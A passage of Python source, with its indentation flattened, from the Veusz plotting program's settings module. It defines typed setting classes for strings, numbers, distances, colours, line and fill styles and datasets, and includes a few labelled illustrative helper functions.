"""Do nothing for backward compatibility settings."""
pass
# Store strings
class Str(Setting):
"""String setting."""
typename = 'str'
def normalize(self, val):
if isinstance(val, cbasestr):
return val
raise utils.InvalidType
def toUIText(self):
return self.val
def fromUIText(self, text):
return text
def makeControl(self, *args):
return controls.String(self, *args)
class Notes(Str):
"""String for making notes."""
typename = 'str-notes'
def makeControl(self, *args):
return controls.Notes(self, *args)
# Store bools
class Bool(Setting):
"""Bool setting."""
typename = 'bool'
def normalize(self, val):
if type(val) in (bool, int):
return bool(val)
raise utils.InvalidType
def toUIText(self):
return 'True' if self.val else 'False'
def fromUIText(self, text):
t = text.strip().lower()
if t in ('true', '1', 't', 'y', 'yes'):
return True
elif t in ('false', '0', 'f', 'n', 'no'):
return False
else:
raise utils.InvalidType
def makeControl(self, *args):
return controls.Bool(self, *args)
# Storing integers
class Int(Setting):
"""Integer settings."""
typename = 'int'
def __init__(self, name, value, minval=-1000000, maxval=1000000,
**args):
"""Initialise the values.
minval is minimum possible value of setting
maxval is maximum possible value of setting
"""
self.minval = minval
self.maxval = maxval
Setting.__init__(self, name, value, **args)
def copy(self):
"""Make a setting which has its values copied from this one.
This needs to be overridden if the constructor changes
"""
return self._copyHelper((), (), {'minval': self.minval,
'maxval': self.maxval})
def normalize(self, val):
if isinstance(val, int):
if val >= self.minval and val <= self.maxval:
return val
else:
raise utils.InvalidType('Value out of allowed range')
raise utils.InvalidType
def toUIText(self):
return uilocale.toString(self.val)
def fromUIText(self, text):
i, ok = uilocale.toLongLong(text)
if not ok:
raise utils.InvalidType
if i >= self.minval and i <= self.maxval:
return i
else:
raise utils.InvalidType('Value out of allowed range')
def makeControl(self, *args):
return controls.Int(self, *args)
def _finiteRangeFloat(f, minval=-1e300, maxval=1e300):
"""Return a finite float in range or raise exception otherwise."""
f = float(f)
if not N.isfinite(f):
raise utils.InvalidType('Finite values only allowed')
if f < minval or f > maxval:
raise utils.InvalidType('Value out of allowed range')
return f
# for storing floats
class Float(Setting):
"""Float settings."""
typename = 'float'
def __init__(self, name, value, minval=-1e200, maxval=1e200,
**args):
"""Initialise the values.
minval is minimum possible value of setting
maxval is maximum possible value of setting
"""
self.minval = minval
self.maxval = maxval
Setting.__init__(self, name, value, **args)
def copy(self):
"""Make a setting which has its values copied from this one.
This needs to be overridden if the constructor changes
"""
return self._copyHelper((), (), {'minval': self.minval,
'maxval': self.maxval})
def normalize(self, val):
if isinstance(val, int) or isinstance(val, float):
return _finiteRangeFloat(
val, minval=self.minval, maxval=self.maxval)
raise utils.InvalidType
def toUIText(self):
return ui_floattostring(self.val)
def fromUIText(self, text):
try:
f = ui_stringtofloat(text)
except ValueError:
# try to evaluate
f = self.safeEvalHelper(text)
return self.normalize(f)
def makeControl(self, *args):
return controls.Edit(self, *args)
class FloatOrAuto(Float):
"""Save a float or text auto."""
typename = 'float-or-auto'
def normalize(self, val):
if type(val) in (int, float):
return _finiteRangeFloat(val, minval=self.minval, maxval=self.maxval)
elif isinstance(val, cbasestr) and val.strip().lower() == 'auto':
return 'Auto'
else:
raise utils.InvalidType
def toUIText(self):
if isinstance(self.val, cbasestr) and self.val.lower() == 'auto':
return 'Auto'
else:
return ui_floattostring(self.val)
def fromUIText(self, text):
if text.strip().lower() == 'auto':
return 'Auto'
else:
return Float.fromUIText(self, text)
def makeControl(self, *args):
return controls.Choice(self, True, ['Auto'], *args)
class IntOrAuto(Setting):
"""Save an int or text auto."""
typename = 'int-or-auto'
def normalize(self, val):
if isinstance(val, int):
return val
elif isinstance(val, cbasestr) and val.strip().lower() == 'auto':
return 'Auto'
else:
raise utils.InvalidType
def toUIText(self):
if isinstance(self.val, cbasestr) and self.val.lower() == 'auto':
return 'Auto'
else:
return uilocale.toString(self.val)
def fromUIText(self, text):
if text.strip().lower() == 'auto':
return 'Auto'
else:
i, ok = uilocale.toLongLong(text)
if not ok:
raise utils.InvalidType
return i
def makeControl(self, *args):
return controls.Choice(self, True, ['Auto'], *args)
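# Illustrative sketch only (not part of Veusz): FloatOrAuto and IntOrAuto
# accept either a number or the text 'auto', which is stored as 'Auto'.
# The setting name 'width' is arbitrary.
def _example_or_auto():
    s = FloatOrAuto('width', 'Auto')
    assert s.fromUIText('auto') == 'Auto'
    assert s.normalize(2.5) == 2.5
    s.set(2.5)
    assert not s.isDefault()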
# these are functions used by the distance setting below.
# they don't work as class methods
def _distPhys(match, painter, mult):
"""Convert a physical unit measure in multiples of points."""
return painter.pixperpt * mult * float(match.group(1))
def _idistval(val, unit):
"""Convert value to text, dropping zeros and . points on right."""
return ("%.3f" % val).rstrip('0').rstrip('.') + unit
def _distInvPhys(pixdist, painter, mult, unit):
"""Convert number of pixels into physical distance."""
return _idistval(pixdist / (mult*painter.pixperpt), unit)
def _distPerc(match, painter):
"""Convert from a percentage of maxdim."""
return painter.maxdim * 0.01 * float(match.group(1))
def _distInvPerc(pixdist, painter):
"""Convert pixel distance into percentage."""
return _idistval(pixdist * 100. / painter.maxdim, '%')
def _distFrac(match, painter):
"""Convert from a fraction a/b of maxdim."""
try:
return painter.maxdim * float(match.group(1))/float(match.group(4))
except ZeroDivisionError:
return 0.
def _distRatio(match, painter):
"""Convert from a simple 0.xx ratio of maxdim."""
# if it's greater than 1 then assume it's a point measurement
if float(match.group(1)) > 1.:
return _distPhys(match, painter, 1)
return painter.maxdim * float(match.group(1))
# regular expression to match distances
distre_expr = r'''^
[ ]* # optional whitespace
(\.?[0-9]+|[0-9]+\.[0-9]*) # a floating point number
[ ]* # whitespace
(cm|pt|mm|inch|in|"|%|| # ( unit, no unit,
(?P<slash>/) ) # or / )
(?(slash)[ ]* # if it was a slash, match any whitespace
(\.?[0-9]+|[0-9]+\.[0-9]*)) # and match following fp number
[ ]* # optional whitespace
$'''
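# A small illustrative helper, not part of Veusz, showing which strings the
# distance expression above accepts; the sample values are arbitrary.
def _example_distance_regex():
    pattern = re.compile(distre_expr, re.VERBOSE)
    for text in ('1pt', '2.5cm', '1in', '10%', '1/3', '0.1', 'bogus'):
        # prints e.g. "1pt True" ... "bogus False"
        print(text, pattern.match(text) is not None)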
class Distance(Setting):
"""A veusz distance measure, e.g. 1pt or 3%."""
typename = 'distance'
# match a distance
distre = re.compile(distre_expr, re.VERBOSE)
# functions to convert from unit values to points
unit_func = {
'cm': lambda match, painter:
_distPhys(match, painter, 720/25.4),
'pt': lambda match, painter:
_distPhys(match, painter, 1.),
'mm': lambda match, painter:
_distPhys(match, painter, 72/25.4),
'in': lambda match, painter:
_distPhys(match, painter, 72.),
'inch': lambda match, painter:
_distPhys(match, painter, 72.),
'"': lambda match, painter:
_distPhys(match, painter, 72.),
'%': _distPerc,
'/': _distFrac,
'': _distRatio
}
# inverse functions for converting points to units
inv_unit_func = {
'cm': lambda match, painter:
_distInvPhys(match, painter, 720/25.4, 'cm'),
'pt': lambda match, painter:
_distInvPhys(match, painter, 1., 'pt'),
'mm': lambda match, painter:
_distInvPhys(match, painter, 72/25.4, 'mm'),
'in': lambda match, painter:
_distInvPhys(match, painter, 72., 'in'),
'inch': lambda match, painter:
_distInvPhys(match, painter, 72., 'in'),
'"': lambda match, painter:
_distInvPhys(match, painter, 72., 'in'),
'%': _distInvPerc,
'/': _distInvPerc,
'': _distInvPerc
}
@classmethod
def isDist(kls, dist):
"""Is the text a valid distance measure?"""
return kls.distre.match(dist) is not None
def normalize(self, val):
if self.distre.match(val) is not None:
return val
else:
raise utils.InvalidType
def toUIText(self):
# convert decimal point to display locale
return self.val.replace('.', uilocale.decimalPoint())
def fromUIText(self, text):
# convert decimal point from display locale
text = text.replace(uilocale.decimalPoint(), '.')
if self.isDist(text):
return text
else:
raise utils.InvalidType
def makeControl(self, *args):
return controls.Distance(self, *args)
@classmethod
def convertDistance(kls, painter, dist):
'''Convert a distance to plotter units.
dist: eg 0.1 (fraction), 10% (percentage), 1/10 (fraction),
10pt, 1cm, 20mm, 1inch, 1in, 1" (size)
painter: painter to get metrics to convert physical sizes
'''
# match distance against expression
m = kls.distre.match(dist)
if m is not None:
# lookup function to call to do conversion
func = kls.unit_func[m.group(2)]
return func(m, painter)
# none of the regexps match
raise ValueError( "Cannot convert distance in form '%s'" %
dist )
def convert(self, painter):
"""Convert this setting's distance as above"""
return self.convertDistance(painter, self.val)
def convertPts(self, painter):
"""Get the distance in points."""
return self.convert(painter) / painter.pixperpt
def convertInverse(self, distpix, painter):
"""Convert distance in pixels into units of this distance.
"""
m = self.distre.match(self.val)
if m is not None:
# if it matches convert back
inversefn = self.inv_unit_func[m.group(2)]
else:
# otherwise force unit
inversefn = self.inv_unit_func['cm']
# do inverse mapping
return inversefn(distpix, painter)
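# Illustrative sketch only: convert a few distances to pixels using a stand-in
# painter.  Real Veusz painters provide pixperpt and maxdim; the values used
# here (1 pixel per point, 500 pixel maximum dimension) are assumptions.
def _example_convert_distance():
    class FakePainter:
        pixperpt = 1.0
        maxdim = 500.0
    painter = FakePainter()
    for text in ('36pt', '2cm', '10%', '1/4'):
        # '36pt' -> 36.0, '2cm' -> ~56.7, '10%' -> 50.0, '1/4' -> 125.0
        print(text, Distance.convertDistance(painter, text))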
class DistancePt(Distance):
"""For a distance in points."""
def makeControl(self, *args):
return controls.DistancePt(self, *args)
class DistancePhysical(Distance):
"""For physical distances (no fractional)."""
def isDist(self, val):
m = self.distre.match(val)
if m:
# disallow non-physical distances
if m.group(2) not in ('/', '', '%'):
return True
return False
def makeControl(self, *args):
return controls.Distance(self, *args, physical=True)
class DistanceOrAuto(Distance):
"""A distance or the value Auto"""
typename = 'distance-or-auto'
distre = re.compile( distre_expr + r'|^Auto$', re.VERBOSE )
def isAuto(self):
return self.val == 'Auto'
def makeControl(self, *args):
return controls.Distance(self, allowauto=True, *args)
class Choice(Setting):
"""One out of a list of strings."""
# maybe should be implemented as a dict to speed up checks
typename = 'choice'
def __init__(self, name, vallist, val, **args):
"""Setting val must be in vallist.
descriptions is an optional addon to put a tooltip on each item
in the control.
"""
assert type(vallist) in (list, tuple)
self.vallist = vallist
self.descriptions = args.get('descriptions', None)
if self.descriptions:
del args['descriptions']
Setting.__init__(self, name, val, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((self.vallist,), (), {})
def normalize(self, val):
if val in self.vallist:
return val
else:
raise utils.InvalidType
def toUIText(self):
return self.val
def fromUIText(self, text):
if text in self.vallist:
return text
else:
raise utils.InvalidType
def makeControl(self, *args):
argsv = {'descriptions': self.descriptions}
return controls.Choice(self, False, self.vallist, *args, **argsv)
class ChoiceOrMore(Setting):
"""One out of a list of strings, or anything else."""
# maybe should be implemented as a dict to speed up checks
typename = 'choice-or-more'
def __init__(self, name, vallist, val, **args):
"""Setting has val must be in vallist.
descriptions is an optional addon to put a tooltip on each item
in the control
"""
self.vallist = vallist
self.descriptions = args.get('descriptions', None)
if self.descriptions:
del args['descriptions']
Setting.__init__(self, name, val, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((self.vallist,), (), {})
def normalize(self, val):
return val
def toUIText(self):
return self.val
def fromUIText(self, text):
return text
def makeControl(self, *args):
argsv = {'descriptions': self.descriptions}
return controls.Choice(self, True, self.vallist, *args, **argsv)
class FloatChoice(ChoiceOrMore):
"""A numeric value, which can also be chosen from the list of values."""
typename = 'float-choice'
def normalize(self, val):
if isinstance(val, int) or isinstance(val, float):
return _finiteRangeFloat(val)
raise utils.InvalidType
def toUIText(self):
return ui_floattostring(self.val)
def fromUIText(self, text):
try:
f = ui_stringtofloat(text)
except ValueError:
# try to evaluate
f = self.safeEvalHelper(text)
return self.normalize(f)
def makeControl(self, *args):
argsv = {'descriptions': self.descriptions}
strings = [ui_floattostring(x) for x in self.vallist]
return controls.Choice(self, True, strings, *args, **argsv)
class FloatDict(Setting):
"""A dictionary, taking floats as values."""
typename = 'float-dict'
def normalize(self, val):
if type(val) != dict:
raise utils.InvalidType
for v in val.values():
if type(v) not in (float, int):
raise utils.InvalidType
# return copy
return dict(val)
def toUIText(self):
text = ['%s = %s' % (k, ui_floattostring(self.val[k]))
for k in sorted(self.val)]
return '\n'.join(text)
def fromUIText(self, text):
"""Do conversion from list of a=X\n values."""
out = {}
# break up into lines
for l in text.split('\n'):
l = l.strip()
if len(l) == 0:
continue
# break up using =
p = l.strip().split('=')
if len(p) != 2:
raise utils.InvalidType
try:
v = ui_stringtofloat(p[1])
except ValueError:
raise utils.InvalidType
out[ p[0].strip() ] = v
return out
def makeControl(self, *args):
return controls.MultiLine(self, *args)
class FloatList(Setting):
"""A list of float values."""
typename = 'float-list'
def normalize(self, val):
if type(val) not in (list, tuple):
raise utils.InvalidType
# horribly slow test for invalid entries
out = []
for i in val:
if type(i) not in (float, int):
raise utils.InvalidType
else:
out.append( float(i) )
return out
def toUIText(self):
"""Make a string a, b, c."""
# can't use the comma for splitting if used as a decimal point
join = ', '
if uilocale.decimalPoint() == ',':
join = '; '
return join.join( [ui_floattostring(x) for x in self.val] )
def fromUIText(self, text):
"""Convert from a, b, c or a b c."""
# don't use commas if it is the decimal separator
splitre = r'[\t\n, ]+'
if uilocale.decimalPoint() == ',':
splitre = r'[\t\n; ]+'
out = []
for x in re.split(splitre, text.strip()):
if x:
try:
out.append( ui_stringtofloat(x) )
except ValueError:
out.append( self.safeEvalHelper(x) )
return out
def makeControl(self, *args):
return controls.String(self, *args)
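# Illustrative sketch only (not part of Veusz): the core of the FloatList text
# splitting above, assuming a locale where '.' is the decimal point so values
# may be separated by commas, spaces or tabs.
def _example_floatlist_split(text='1.5, 2 3\t4'):
    # returns [1.5, 2.0, 3.0, 4.0]
    return [float(x) for x in re.split(r'[\t\n, ]+', text.strip()) if x]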
class WidgetPath(Str):
"""A setting holding a path to a widget. This is checked for validity."""
typename = 'widget-path'
def __init__(self, name, val, relativetoparent=True,
allowedwidgets = None,
**args):
"""Initialise the setting.
The widget is located relative to
parent if relativetoparent is True, otherwise this widget.
If allowedwidgets is not None, only those widget types in the list are
allowed by this setting.
"""
Str.__init__(self, name, val, **args)
self.relativetoparent = relativetoparent
self.allowedwidgets = allowedwidgets
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (),
{'relativetoparent': self.relativetoparent,
'allowedwidgets': self.allowedwidgets})
def getReferredWidget(self, val = None):
"""Get the widget referred to. We double-check here to make sure
it's the one.
Returns None if setting is blank
utils.InvalidType is raised if there's a problem
"""
# this is a bit of a hack, so we don't have to pass a value
# for the setting (which we need to do when called from normalize)
if val is None:
val = self.val
if val == '':
return None
# find the widget associated with this setting
widget = self
while not widget.iswidget:
widget = widget.parent
# usually makes sense to give paths relative to a parent of a widget
if self.relativetoparent:
widget = widget.parent
# resolve the text to a widget
try:
widget = widget.document.resolveWidgetPath(widget, val)
except ValueError:
raise utils.InvalidType
# check the widget against the list of allowed types if given
if self.allowedwidgets is not None:
allowed = False
for c in self.allowedwidgets:
if isinstance(widget, c):
allowed = True
if not allowed:
raise utils.InvalidType
return widget
class Dataset(Str):
"""A setting to choose from the possible datasets."""
typename = 'dataset'
def __init__(self, name, val, dimensions=1, datatype='numeric',
**args):
"""
dimensions is the number of dimensions the dataset needs
"""
self.dimensions = dimensions
self.datatype = datatype
Setting.__init__(self, name, val, **args)
def copy(self):
"""Make a setting which has its values copied from this one."""
return self._copyHelper((), (),
{'dimensions': self.dimensions,
'datatype': self.datatype})
def makeControl(self, *args):
"""Allow user to choose between the datasets."""
return controls.Dataset(self, self.getDocument(), self.dimensions,
self.datatype, *args)
def getData(self, doc):
"""Return a list of datasets entered."""
d = doc.data.get(self.val)
if ( d is not None and
d.datatype == self.datatype and
(d.dimensions == self.dimensions or self.dimensions == 'all') ):
return d
class Strings(Setting):
"""A multiple set of strings."""
typename = 'str-multi'
def normalize(self, val):
"""Takes a tuple/list of strings:
('ds1','ds2'...)
"""
if isinstance(val, cbasestr):
return (val, )
if type(val) not in (list, tuple):
raise utils.InvalidType
# check each entry in the list is appropriate
for ds in val:
if not isinstance(ds, cbasestr):
raise utils.InvalidType
return tuple(val)
def makeControl(self, *args):
"""Allow user to choose between the datasets."""
return controls.Strings(self, self.getDocument(), *args)
class Datasets(Setting):
"""A setting to choose one or more of the possible datasets."""
typename = 'dataset-multi'
def __init__(self, name, val, dimensions=1, datatype='numeric',
**args):
"""
dimensions is the number of dimensions the dataset needs
"""
Setting.__init__(self, name, val, **args)
self.dimensions = dimensions
self.datatype = datatype
def normalize(self, val):
"""Takes a tuple/list of strings:
('ds1','ds2'...)
"""
if isinstance(val, cbasestr):
return (val, )
if type(val) not in (list, tuple):
raise utils.InvalidType
# check each entry in the list is appropriate
for ds in val:
if not isinstance(ds, cbasestr):
raise utils.InvalidType
return tuple(val)
def copy(self):
"""Make a setting which has its values copied from this one."""
return self._copyHelper((), (),
{'dimensions': self.dimensions,
'datatype': self.datatype})
def makeControl(self, *args):
"""Allow user to choose between the datasets."""
return controls.Datasets(self, self.getDocument(), self.dimensions,
self.datatype, *args)
def getData(self, doc):
"""Return a list of datasets entered."""
out = []
for name in self.val:
d = doc.data.get(name)
if ( d is not None and
d.datatype == self.datatype and
d.dimensions == self.dimensions ):
out.append(d)
return out
class DatasetExtended(Dataset):
"""Choose a dataset, give an expression or specify a list of float
values."""
typename = 'dataset-extended'
def normalize(self, val):
"""Check is a string (dataset name or expression) or a list of
floats (numbers).
"""
if isinstance(val, cbasestr):
return val
elif self.dimensions == 1:
# list of numbers only allowed for 1d datasets
if isinstance(val, float) or isinstance(val, int):
return [val]
else:
try:
return [float(x) for x in val]
except (TypeError, ValueError):
pass
raise utils.InvalidType
def toUIText(self):
if isinstance(self.val, cbasestr):
return self.val
else:
# join based on , or ; depending on decimal point
join = ', '
if uilocale.decimalPoint() == ',':
join = '; '
return join.join( [ ui_floattostring(x)
for x in self.val ] )
def fromUIText(self, text):
"""Convert from text."""
text = text.strip()
if self.dimensions > 1:
return text
# split based on , or ; depending on decimal point
splitre = r'[\t\n, ]+'
if uilocale.decimalPoint() == ',':
splitre = r'[\t\n; ]+'
out = []
for x in re.split(splitre, text):
if x:
try:
out.append( ui_stringtofloat(x) )
except ValueError:
# fail conversion, so exit with text
return text
return out
def getFloatArray(self, doc):
"""Get a numpy of values or None."""
if isinstance(self.val, cbasestr):
ds = doc.evaluate.evalDatasetExpression(
self.val, datatype=self.datatype, dimensions=self.dimensions)
if ds:
# get numpy array of values
return N.array(ds.data)
else:
# list of values
return N.array(self.val)
return None
def isDataset(self, doc):
"""Is this setting a dataset?"""
return (isinstance(self.val, cbasestr) and
doc.data.get(self.val))
def isEmpty(self):
"""Is this unset?"""
return self.val == [] or self.val == ''
def getData(self, doc):
"""Return veusz dataset"""
if isinstance(self.val, cbasestr):
return doc.evaluate.evalDatasetExpression(
self.val, datatype=self.datatype, dimensions=self.dimensions)
else:
return datasets.valsToDataset(
self.val, self.datatype, self.dimensions)
class DatasetOrStr(Dataset):
"""Choose a dataset or enter a string.
Non-string datasets are converted to arrays of strings by this setting.
"""
typename = 'dataset-or-str'
def __init__(self, name, val, **args):
Dataset.__init__(self, name, val, datatype='text', **args)
def getData(self, doc, checknull=False):
"""Return either a list of strings, a single item list.
If checknull then None is returned if blank
"""
if doc:
ds = doc.data.get(self.val)
if ds and ds.dimensions == 1:
return doc.formatValsWithDatatypeToText(
ds.data, ds.displaytype)
if checknull and not self.val:
return None
else:
return [cstr(self.val)]
def makeControl(self, *args):
return controls.DatasetOrString(self, self.getDocument(), *args)
def copy(self):
"""Make a setting which has its values copied from this one."""
return self._copyHelper((), (), {})
class Color(ChoiceOrMore):
"""A color setting."""
typename = 'color'
def __init__(self, name, value, **args):
"""Initialise the color setting with the given name, default
and description."""
ChoiceOrMore.__init__(self, name, [], value, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
def color(self, painter, dataindex=0):
"""Return QColor from color.
painter is a Veusz Painter
dataindex is index for automatically getting colors for subdatasets.
"""
if self.val.lower() == 'auto':
# lookup widget
w = self.parent
while w is not None and not w.iswidget:
w = w.parent
if w is None:
return qt4.QColor()
# get automatic color
return painter.docColor(w.autoColor(painter, dataindex=dataindex))
else:
return painter.docColor(self.val)
def makeControl(self, *args):
return controls.Color(self, *args)
class FillStyle(Choice):
"""A setting for the different fill styles provided by Qt."""
typename = 'fill-style'
_fillstyles = [ 'solid', 'horizontal', 'vertical', 'cross',
'forward diagonals', 'backward diagonals',
'diagonal cross',
'94% dense', '88% dense', '63% dense', '50% dense',
'37% dense', '12% dense', '6% dense' ]
_fillcnvt = { 'solid': qt4.Qt.SolidPattern,
'horizontal': qt4.Qt.HorPattern,
'vertical': qt4.Qt.VerPattern,
'cross': qt4.Qt.CrossPattern,
'forward diagonals': qt4.Qt.FDiagPattern,
'backward diagonals': qt4.Qt.BDiagPattern,
'diagonal cross': qt4.Qt.DiagCrossPattern,
'94% dense': qt4.Qt.Dense1Pattern,
'88% dense': qt4.Qt.Dense2Pattern,
'63% dense': qt4.Qt.Dense3Pattern,
'50% dense': qt4.Qt.Dense4Pattern,
'37% dense': qt4.Qt.Dense5Pattern,
'12% dense': qt4.Qt.Dense6Pattern,
'6% dense': qt4.Qt.Dense7Pattern }
controls.FillStyle._fills = _fillstyles
controls.FillStyle._fillcnvt = _fillcnvt
def __init__(self, name, value, **args):
Choice.__init__(self, name, self._fillstyles, value, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
def qtStyle(self):
"""Return Qt ID of fill."""
return self._fillcnvt[self.val]
def makeControl(self, *args):
return controls.FillStyle(self, *args)
class LineStyle(Choice):
"""A setting choosing a particular line style."""
typename = 'line-style'
# list of allowed line styles
_linestyles = ['solid', 'dashed', 'dotted',
'dash-dot', 'dash-dot-dot', 'dotted-fine',
'dashed-fine', 'dash-dot-fine',
'dot1', 'dot2', 'dot3', 'dot4',
'dash1', 'dash2', 'dash3', 'dash4', 'dash5',
'dashdot1', 'dashdot2', 'dashdot3']
# convert from line styles to Qt constants and a custom pattern (if any)
_linecnvt = { 'solid': (qt4.Qt.SolidLine, None),
'dashed': (qt4.Qt.DashLine, None),
'dotted': (qt4.Qt.DotLine, None),
'dash-dot': (qt4.Qt.DashDotLine, None),
'dash-dot-dot': (qt4.Qt.DashDotDotLine, None),
'dotted-fine': (qt4.Qt.CustomDashLine, [2, 4]),
'dashed-fine': (qt4.Qt.CustomDashLine, [8, 4]),
'dash-dot-fine': (qt4.Qt.CustomDashLine, [8, 4, 2, 4]),
'dot1': (qt4.Qt.CustomDashLine, [0.1, 2]),
'dot2': (qt4.Qt.CustomDashLine, [0.1, 4]),
'dot3': (qt4.Qt.CustomDashLine, [0.1, 6]),
'dot4': (qt4.Qt.CustomDashLine, [0.1, 8]),
'dash1': (qt4.Qt.CustomDashLine, [4, 4]),
'dash2': (qt4.Qt.CustomDashLine, [4, 8]),
'dash3': (qt4.Qt.CustomDashLine, [8, 8]),
'dash4': (qt4.Qt.CustomDashLine, [16, 8]),
'dash5': (qt4.Qt.CustomDashLine, [16, 16]),
'dashdot1': (qt4.Qt.CustomDashLine, [0.1, 4, 4, 4]),
'dashdot2': (qt4.Qt.CustomDashLine, [0.1, 4, 8, 4]),
'dashdot3': (qt4.Qt.CustomDashLine, [0.1, 2, 4, 2]),
}
controls.LineStyle._lines = _linestyles
def __init__(self, name, default, **args):
Choice.__init__(self, name, self._linestyles, default, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
def qtStyle(self):
"""Get Qt ID of chosen line style."""
return self._linecnvt[self.val]
def makeControl(self, *args):
return controls.LineStyle(self, *args)
class Axis(Str):
"""A setting to hold the name of an axis.
direction is 'horizontal', 'vertical' or 'both'
"""
typename = 'axis'
def __init__(self, name, val, direction, **args):
"""Initialise using the document, so we can get the axes later.
direction is horizontal or vertical to specify the type of axis to
show
"""
Setting.__init__(self, name, val, **args)
self.direction = direction
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (self.direction,), {})
def makeControl(self, *args):
"""Allows user to choose an axis or enter a name."""
return controls.Axis(self, self.getDocument(), self.direction, *args)
class WidgetChoice(Str):
"""Hold the name of a child widget."""
typename = 'widget-choice'
def __init__(self, name, val, widgettypes={}, **args):
"""Choose widgets from (named) type given."""
Setting.__init__(self, name, val, **args)
self.widgettypes = widgettypes
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (),
{'widgettypes': self.widgettypes})
def buildWidgetList(self, level, widget, outdict):
"""A recursive helper to build up a list of possible widgets.
This iterates over widget's children, and adds widgets as tuples
to outdict using outdict[name] = (widget, level)
Widgets of the same name at a lower level take precedence over those
further down the tree
"""
for child in widget.children:
if child.typename in self.widgettypes:
if (child.name not in outdict) or (outdict[child.name][1]>level):
outdict[child.name] = (child, level)
else:
self.buildWidgetList(level+1, child, outdict)
def getWidgetList(self):
"""Return a dict of valid widget names and the corresponding objects."""
# find widget which contains setting
widget = self.parent
while not widget.iswidget and widget is not None:
widget = widget.parent
# get widget's parent
if widget is not None:
widget = widget.parent
# get list of widgets from recursive find
widgets = {}
if widget is not None:
self.buildWidgetList(0, widget, widgets)
# turn (object, level) pairs into object
outdict = {}
for name, val in widgets.items():
outdict[name] = val[0]
return outdict
def findWidget(self):
"""Find the image corresponding to this setting.
Returns Image object if succeeds or None if fails
"""
widgets = self.getWidgetList()
try:
return widgets[self.get()]
except KeyError:
return None
def makeControl(self, *args):
"""Allows user to choose an image widget or enter a name."""
return controls.WidgetChoice(self, self.getDocument(), *args)
class Marker(Choice):
"""Choose a marker type from one allowable."""
typename = 'marker'
def __init__(self, name, value, **args):
Choice.__init__(self, name, utils.MarkerCodes, value, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
def makeControl(self, *args):
return controls.Marker(self, *args)
class Arrow(Choice):
"""Choose an arrow type from one allowable."""
typename = 'arrow'
def __init__(self, name, value, **args):
Choice.__init__(self, name, utils.ArrowCodes, value, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
def makeControl(self, *args):
return controls.Arrow(self, *args)
class LineSet(Setting):
"""A setting which corresponds to a set of lines.
"""
typename='line-multi'
def normalize(self, val):
"""Takes a tuple/list of tuples:
[('dotted', '1pt', 'color', <trans>, False), ...]
These are style, width, color, and hide or
style, width, color, transparency, hide
"""
if type(val) not in (list, tuple):
raise utils.InvalidType
# check each entry in the list is appropriate
for line in val:
try:
style, width, color, hide = line
except ValueError:
raise utils.InvalidType
if ( not isinstance(color, cbasestr) or
not Distance.isDist(width) or
style not in LineStyle._linestyles or
type(hide) not in (int, bool) ):
raise utils.InvalidType
return val
def makeControl(self, *args):
"""Make specialised lineset control."""
return controls.LineSet(self, *args)
def makePen(self, painter, row):
"""Make a pen for the painter using row.
If row is outside of range, then cycle
"""
if len(self.val) == 0:
return qt4.QPen(qt4.Qt.NoPen)
else:
row = row % len(self.val)
v = self.val[row]
style, width, color, hide = v
width = Distance.convertDistance(painter, width)
style, dashpattern = LineStyle._linecnvt[style]
col = painter.docColor(color)
pen = qt4.QPen(col, width, style)
if dashpattern:
pen.setDashPattern(dashpattern)
if hide:
pen.setStyle(qt4.Qt.NoPen)
return pen
class FillSet(Setting):
"""A setting which corresponds to a set of fills.
This setting keeps an internal list of fill specification tuples.
"""
typename = 'fill-multi'
def normalize(self, val):
"""Takes a tuple/list of tuples:
[('solid', 'color', False), ...]
Each entry is (style, color, hide) or
(style, color, hide, transparency, linewidth,
linestyle, spacing, backcolor, backtrans, backhide)
"""
if type(val) not in (list, tuple):
raise utils.InvalidType
# check each entry in the list is appropriate
for fill in val:
try:
style, color, hide = fill[:3]
except ValueError:
raise utils.InvalidType
if ( not isinstance(color, cbasestr) or
style not in utils.extfillstyles or
type(hide) not in (int, bool) or
len(fill) not in (3, 10) ):
raise utils.InvalidType
return val
def makeControl(self, *args):
"""Make specialised lineset control."""
return controls.FillSet(self, *args)
def returnBrushExtended(self, row):
"""Return BrushExtended for the row."""
from . import collections
s = collections.BrushExtended('tempbrush')
s.parent = self
if len(self.val) == 0:
s.hide = True
else:
v = self.val[row % len(self.val)]
s.style = v[0]
s.color = v[1]
s.hide = v[2]
if len(v) == 10:
(s.transparency, s.linewidth, s.linestyle,
s.patternspacing, s.backcolor,
s.backtransparency, s.backhide) = v[3:]
return s
class Filename(Str):
"""Represents a filename setting."""
typename = 'filename'
def makeControl(self, *args):
return controls.Filename(self, 'file', *args)
def normalize(self, val):
if sys.platform == 'win32':
val = val.replace('\\', '/')
return val
class ImageFilename(Filename):
"""Represents an image filename setting."""
typename = 'filename-image'
def makeControl(self, *args):
return controls.Filename(self, 'image', *args)
class FontFamily(Str):
"""Represents a font family."""
typename = 'font-family'
def makeControl(self, *args):
"""Make a special font combobox."""
return controls.FontFamily(self, *args)
class ErrorStyle(Choice):
"""Error bar style.
The allowed values are below in _errorstyles.
"""
typename = 'errorbar-style'
_errorstyles = (
'none',
'bar', 'barends', 'box', 'diamond', 'curve',
'barbox', 'bardiamond', 'barcurve',
'boxfill', 'diamondfill', 'curvefill',
'fillvert', 'fillhorz',
'linevert', 'linehorz',
'linevertbar', 'linehorzbar'
)
controls.ErrorStyle._errorstyles = _errorstyles
def __init__(self, name, value, **args):
Choice.__init__(self, name, self._errorstyles, value, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
def makeControl(self, *args):
return controls.ErrorStyle(self, *args)
class AlignHorz(Choice):
"""Alignment horizontally."""
typename = 'align-horz'
def __init__(self, name, value, **args):
Choice.__init__(self, name, ['left', 'centre', 'right'], value, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
class AlignVert(Choice):
"""Alignment vertically."""
typename = 'align-vert'
def __init__(self, name, value, **args):
Choice.__init__(self, name, ['top', 'centre', 'bottom'], value, **args)
def copy(self):
